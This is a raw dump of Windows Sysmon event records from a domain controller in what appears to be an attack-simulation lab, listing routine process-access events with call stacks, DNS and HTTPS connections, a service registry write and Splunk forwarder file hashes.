10341000x80000000000000004535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.572{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.572{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
13241300x80000000000000004533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.463{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\EFS\StartDWORD (0x00000003) 23542300x80000000000000004532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.447{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7E5AE8C0B08F177685A5777D0683C308,SHA256=CB66257DF5D01951F623B3469253D1F18A3C902B3A7F28A040D1FD492324854B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000004531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.264{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local56991- 354300x80000000000000004530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.264{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62977- 10341000x80000000000000004529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.323{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.323{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.291{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.291{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.291{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+3a1a|c:\windows\system32\SYSNTFY.dll+1e8d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.291{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.276{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\sessenv.dll+3de88|c:\windows\system32\sessenv.dll+f881|c:\windows\system32\sessenv.dll+677c|c:\windows\system32\SYSNTFY.dll+1e8d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.260{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.260{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.260{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.260{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.198{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40C0918907B992E2B931BC03C6329778,SHA256=D7A2819F88C74A009909F63620E9E9F5F5DF7A9CBDF7735106563B7B0F6E7351,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000004517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.980{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local64956- 354300x80000000000000004516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.980{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local57018- 
354300x80000000000000004515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.156{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53568-false52.250.46.236-443https 354300x80000000000000004514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.998{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63556- 23542300x80000000000000004513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.167{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=26524C8AFA908978934B81AA735535EE,SHA256=5B6DE59B03777572AD1A9F4C862040AB29A9BB358EA0251B4C0C9780BB5914CB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.151{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64C4-6064-9F00-00000000AE01}3448C:\Windows\system32\ServerManagerLauncher.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000004511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.151{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=187298FBDC73F950802B3821D39DFD05,SHA256=34190C991BFF43635D699161ADD7B30EC82639009C863EC8408157B9E4DB227A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.151{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.151{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.151{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.151{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.151{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64C4-6064-9F00-00000000AE01}3448C:\Windows\system32\ServerManagerLauncher.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.151{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-64C4-6064-9F00-00000000AE01}3448C:\Windows\system32\ServerManagerLauncher.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+acf0|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+108c6|c:\windows\system32\UBPM.dll+d439|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.136{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 